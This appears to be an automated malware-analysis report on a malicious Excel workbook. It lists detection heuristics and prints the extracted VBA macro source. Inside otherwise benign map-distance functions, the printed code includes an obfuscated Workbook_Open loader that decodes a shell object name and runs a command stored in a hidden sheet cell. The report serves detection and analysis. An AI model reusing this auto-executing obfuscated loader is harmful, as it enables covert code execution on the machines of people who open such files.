MALICIOUS
330
Risk Score
Heuristics 10
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
ClamAV: Xls.Malware.Valyria-9756472-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP") -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://maps.googleapis.com/maps/api/distancematrix/json?origins= Referenced by macro
- http://maps.googleapis.com/maps/api/distancematrix/json?origins=&destinations=&mode=car&language=en&sensor=false&key=YOUR_KEYReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 229 bytes |
SHA-256: 51a866f137266a6992be40f9dc7d72ed5e598fb2427f4d48040e9057fecf6519 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - SPDY ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10289 bytes |
SHA-256: 24797d992e64dc3a2b0cb2e4dea07e4490c96ea152b73a07e63c85a75972c6ef |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public g7fac28aa2 As Object
Public Function GetDuration(start As String, dest As String)
Dim firstVal As String, secondVal As String, lastVal As String
firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
secondVal = "&destinations="
lastVal = "&mode=car&language=en&sensor=false&key=YOUR_KEY"
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send ("")
If InStr(objHTTP.responseText, """duration"" : {") = 0 Then GoTo ErrorHandl
Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = "duration(?:.|\n)*?""value"".*?([0-9]+)": regex.Global = False
Set matches = regex.Execute(objHTTP.responseText)
tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
GetDuration = CDbl(tmpVal)
Exit Function
ErrorHandl:
GetDuration = -1
End Function
Public Function GetDistanceCoord(ByVal lat1 As Double, ByVal lon1 As Double, ByVal lat2 As Double, ByVal lon2 As Double, ByVal unit As String) As Double
Dim theta As Double: theta = lon1 - lon2
Dim dist As Double: dist = Math.Sin(deg2rad(lat1)) * Math.Sin(deg2rad(lat2)) + Math.Cos(deg2rad(lat1)) * Math.Cos(deg2rad(lat2)) * Math.Cos(deg2rad(theta))
dist = WorksheetFunction.Acos(dist)
dist = rad2deg(dist)
dist = dist * 60 * 1.1515
If unit = "K" Then
dist = dist * 1.609344
ElseIf unit = "N" Then
dist = dist * 0.8684
End If
GetDistanceCoord = dist
End Function
Function deg2rad(ByVal deg As Double) As Double
deg2rad = (deg * WorksheetFunction.Pi / 180#)
End Function
Function rad2deg(ByVal rad As Double) As Double
rad2deg = rad / WorksheetFunction.Pi * 180#
End Function
Sub Workbook_Open()
Set g7fac28aa2 = CreateObject(c539a22f3a4("837F8F9E959CA05A7F94919898"))
Dim ed1dfe4488f As Long: ed1dfe4488f = 5
Dim tb3413354 As String
Dim ta3746518c572376f2 As Long
Select Case ed1dfe4488f
Case 8 + (72 - 84) + Int(5 + 22 - 4) + 8 * Int(98 / 91 + 19) - Int(3342 / 5684) * 17
tb3413354 = "ucf1dc47cf2"
Case 8 / Int(21 + 22 / 4) / 17 + (336 - 72) + Int(5 + 11 - 25) + 16
tb3413354 = "h323f5258919cae"
Case 11 * Int(83 / 74 + 15) - Int(4841 / 3732) * 20 / Int(4 + 27 / 10) / 5 - (12 + 12) - 13
tb3413354 = "r65db9a3d4f4a82"
Case 5 - (18 + 6) - 6 - (8 + 14) - 18 * Int(55 / 97 + 19) - Int(2751 / 2995) * 26
tb3413354 = "c85da91b8"
Case 5 * Int(32 / 77 + 9) - Int(1111 / 5140) * 17 + (288 - 324) + Int(28 + 27 - 16) + 5 / Int(12 + 12 / 24) / 17
tb3413354 = "y351dc8a7f5eca"
Case 19 / Int(16 + 24 / 25) / 17 - (4 + 29) - 20
tb3413354 = "nf6f8491e3efb39"
Case 6 - (21 + 9) - 16 * Int(60 / 33 + 14) - Int(2439 / 5832) * 29 / Int(10 + 6 / 9) / 29
tb3413354 = "jfec277fc6a"
Case 13 * Int(39 / 69 + 15) - Int(3051 / 5617) * 28 / Int(6 + 24 / 10) / 26
tb3413354 = "b1b556b"
Case 4 / Int(29 + 25 / 4) / 11 * Int(54 / 67 + 17) - Int(4380 / 2575) * 12
tb3413354 = "s69c7cf79771"
Case 22 / Int(27 + 27 / 11) / 7 + (240 - 276) + Int(26 + 9 - 15) + 27
tb3413354 = "zb988a"
Case 9 + (192 - 204) + Int(12 + 15 - 16) + 4 + (96 - 60) + Int(14 + 15 - 23) + 8 / Int(9 + 14 / 6) / 6
tb3413354 = "b1cb48e8135"
Case 22 * Int(99 / 52 + 9) - Int(3164 / 3907) * 5 * Int(24 / 38 + 11) - Int(3806 / 2959) * 14 + (60 - 180) + Int(5 + 10 - 11) + 6
tb3413354 = "hf57fbee19"
Case 7 - (6 + 17) - 14 / Int(28 + 26 / 16) / 22 - (17 + 4) - 8
tb3413354 = "k93dcfc76"
Case 5 + (264 - 348) + Int(10 + 26 - 22) + 27 + (120 - 324) + Int(11 + 8 - 17) + 24 + (108 - 276) + Int(29 + 13 - 25) + 19
tb3413354 = "ubd383"
Case 10 / Int(5 + 6 / 19) / 17 * Int(19 / 40 + 13) - Int(4235 / 3938) * 22
tb3413354 = "w2f1c292fe4645"
Case 24 * Int(49 / 86 + 19) - Int(3817 / 2372) * 4 / Int(6 + 4 / 8) / 7
tb3413354 = "rb7ca5c3e58"
Case 19 / Int(18 + 5 / 21) / 14 * Int(44 / 73 + 10) - Int(1425 / 3347) * 5 + (60 - 348) + Int(12 + 22 - 15) + 21
tb3413354 = "pd1d23e29"
Case 5 * Int(92 / 63 + 19) - Int(170 / 2313) * 23 * Int(35 / 74 + 16) - Int(4868 / 1279) * 8
tb3413354 = "oc1456a2bca13c5"
Case 7 / Int(28 + 24 / 13) / 26 + (276 - 168) + Int(8 + 15 - 25) + 27
tb3413354 = "te59b5e93e8"
Case 22 + (180 - 228) + Int(24 + 17 - 17) + 15 * Int(40 / 30 + 10) - Int(2710 / 1864) * 6
tb3413354 = "aced4ab"
Case 11 / Int(17 + 19 / 24) / 27 - (26 + 7) - 16 * Int(46 / 63 + 17) - Int(4662 / 561) * 18
tb3413354 = "s19f2645285e3"
Case 15 / Int(13 + 24 / 7) / 20 / Int(12 + 25 / 16) / 23
tb3413354 = "va692e"
Case 25 * Int(72 / 39 + 10) - Int(3140 / 1951) * 28 * Int(63 / 73 + 17) - Int(1891 / 133) * 15 + (264 - 204) + Int(18 + 10 - 4) + 23
tb3413354 = "xa18af88772"
Case 4 * Int(33 / 94 + 19) - Int(3009 / 5789) * 12 / Int(12 + 5 / 24) / 4
tb3413354 = "b9cef2"
Case 7 + (72 - 192) + Int(12 + 13 - 16) + 21 - (10 + 13) - 21 + (252 - 228) + Int(17 + 11 - 17) + 23
tb3413354 = "g41434"
Case 24 * Int(63 / 75 + 9) - Int(4563 / 2857) * 18 / Int(9 + 29 / 14) / 18
tb3413354 = "mcd14376c"
Case 24 - (9 + 22) - 29 / Int(8 + 13 / 9) / 16 + (156 - 336) + Int(29 + 12 - 15) + 22
tb3413354 = "k111564bcd2"
Case 20 / Int(22 + 22 / 24) / 22 - (5 + 5) - 4 * Int(36 / 86 + 9) - Int(219 / 4959) * 21
tb3413354 = "v512ddebf7e3a6"
Case 22 / Int(18 + 17 / 11) / 4 + (276 - 204) + Int(28 + 19 - 17) + 12 - (29 + 8) - 5
tb3413354 = "tc9de7678a"
Case 15 - (26 + 20) - 8 - (27 + 6) - 13 + (336 - 312) + Int(8 + 10 - 15) + 7
tb3413354 = "z77311a3e"
Case 12 / Int(27 + 24 / 16) / 6 / Int(16 + 14 / 18) / 19 + (96 - 252) + Int(20 + 25 - 25) + 21
tb3413354 = "nbf32ba5c8f9bc9"
Case 18 - (14 + 7) - 7 * Int(91 / 92 + 10) - Int(656 / 1371) * 19 / Int(21 + 8 / 20) / 5
tb3413354 = "fc9b822f91e7173"
Case 15 - (22 + 29) - 19 - (13 + 11) - 15
tb3413354 = "lc1a45656b"
Case 12 + (348 - 240) + Int(6 + 23 - 17) + 20 - (27 + 18) - 22 + (252 - 48) + Int(24 + 26 - 20) + 7
tb3413354 = "t2e643d"
Case 14 + (324 - 228) + Int(17 + 26 - 21) + 9 * Int(56 / 71 + 11) - Int(107 / 5700) * 25
tb3413354 = "m4d31493a7cdee"
Case 5 / Int(14 + 27 / 5) / 8 - (21 + 8) - 19
tb3413354 = "w8683d1df77"
Case 6 - (29 + 26) - 27 * Int(76 / 79 + 10) - Int(380 / 1514) * 18
tb3413354 = "k455dc167c4914"
Case 25 + (156 - 324) + Int(5 + 19 - 23) + 9 - (24 + 19) - 29
tb3413354 = "c837f7368754c"
Case 16 * Int(66 / 67 + 19) - Int(4942 / 3191) * 20 + (72 - 120) + Int(25 + 24 - 20) + 10
tb3413354 = "k864dc9fc"
Case 5:
obe4f5e547c855 ("hacc25b8759b3")
Case 14 - (5 + 28) - 23 / Int(16 + 13 / 28) / 23 - (19 + 6) - 4
tb3413354 = "w83bfd"
Case 26 * Int(73 / 56 + 18) - Int(2607 / 2888) * 14 / Int(17 + 13 / 8) / 27
tb3413354 = "u9c5f6913e"
Case 21 * Int(80 / 43 + 9) - Int(235 / 1822) * 18 - (27 + 9) - 22 - (23 + 28) - 6
tb3413354 = "x733df1e7fc2c"
Case 6 - (11 + 13) - 27 / Int(18 + 19 / 24) / 27 - (18 + 8) - 22
tb3413354 = "j471d1f4bd5a5"
Case 19 / Int(13 + 6 / 18) / 8 + (72 - 240) + Int(9 + 24 - 21) + 18 - (10 + 17) - 24
tb3413354 = "q7c57a3"
Case 16 / Int(20 + 4 / 11) / 10 - (5 + 10) - 5
tb3413354 = "j25d5bf1e"
Case 11 - (22 + 9) - 18 * Int(94 / 57 + 19) - Int(1184 / 2242) * 26
tb3413354 = "me4cc9e83c5f8c4"
Case 8 / Int(10 + 27 / 24) / 16 * Int(90 / 38 + 10) - Int(4272 / 3420) * 28 * Int(89 / 49 + 13) - Int(4568 / 4837) * 19
tb3413354 = "mac24c6"
Case 24 - (21 + 24) - 27 * Int(39 / 91 + 13) - Int(661 / 5452) * 23
tb3413354 = "ke6a5dd5"
Case 26 - (15 + 12) - 26 - (10 + 22) - 16 / Int(4 + 13 / 11) / 14
tb3413354 = "wb1e95df"
Case 22 / Int(24 + 29 / 22) / 15 * Int(59 / 71 + 15) - Int(612 / 4695) * 4
tb3413354 = "xf4a423d8f"
Case 11 * Int(93 / 79 + 9) - Int(2056 / 340) * 14 / Int(12 + 16 / 6) / 23 * Int(78 / 59 + 9) - Int(1862 / 1841) * 22
tb3413354 = "g773d87dece99"
Case 21 * Int(19 / 55 + 17) - Int(4560 / 5731) * 22 - (25 + 9) - 4 - (22 + 19) - 28
tb3413354 = "lbdcdf9c65f6"
Case 9 / Int(6 + 17 / 4) / 18 - (29 + 14) - 21 + (96 - 276) + Int(28 + 5 - 29) + 27
tb3413354 = "fe12f71c1d7b"
Case 7 * Int(45 / 82 + 14) - Int(3310 / 3877) * 22 + (84 - 192) + Int(15 + 24 - 4) + 26 - (28 + 15) - 29
tb3413354 = "bab6c1439ffb5a"
End Select
End Sub
Private Function obe4f5e547c855(ByVal u276769f3aebf As String) As String
g7fac28aa2.Run c539a22f3a4(ThisWorkbook.Sheets("SPDYR").Range("G135").Value), 0, True
End Function
Private Function c539a22f3a4(ByVal u276769f3aebf As String)
Dim cce69e22cff As String: Dim fafa6ded158 As Long
For fafa6ded158 = 1 To Len(u276769f3aebf) Step 2
cce69e22cff = cce69e22cff & Chr(Val(Chr(Int(0 + Int(11 / 4) + Int(11 / 8) + 5 - 9 + 8 - 9 + Int(10 / 3) + 37)) & Chr(Int(0 + 9 + 4 - 11 + Int(7 / 1) - 7 - 13 + Int(8 / 2) + 79)) & Right(Left(u276769f3aebf, fafa6ded158 + ((34 + 6 - 20) / 2 - 9)), (43 - 23 - 10 + 5 - 13))) - 44)
Next
c539a22f3a4 = cce69e22cff
End Function
Public Function GetDistance(start As String, dest As String)
Dim firstVal As String, secondVal As String, lastVal As String
firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
secondVal = "&destinations="
lastVal = "&mode=car&language=pl&sensor=false&key=YOUR_KEY"
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send ("")
If InStr(objHTTP.responseText, """distance"" : {") = 0 Then GoTo ErrorHandl
Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = """value"".*?([0-9]+)": regex.Global = False
Set matches = regex.Execute(objHTTP.responseText)
tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
GetDistance = CDbl(tmpVal)
Exit Function
ErrorHandl:
GetDistance = -1
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.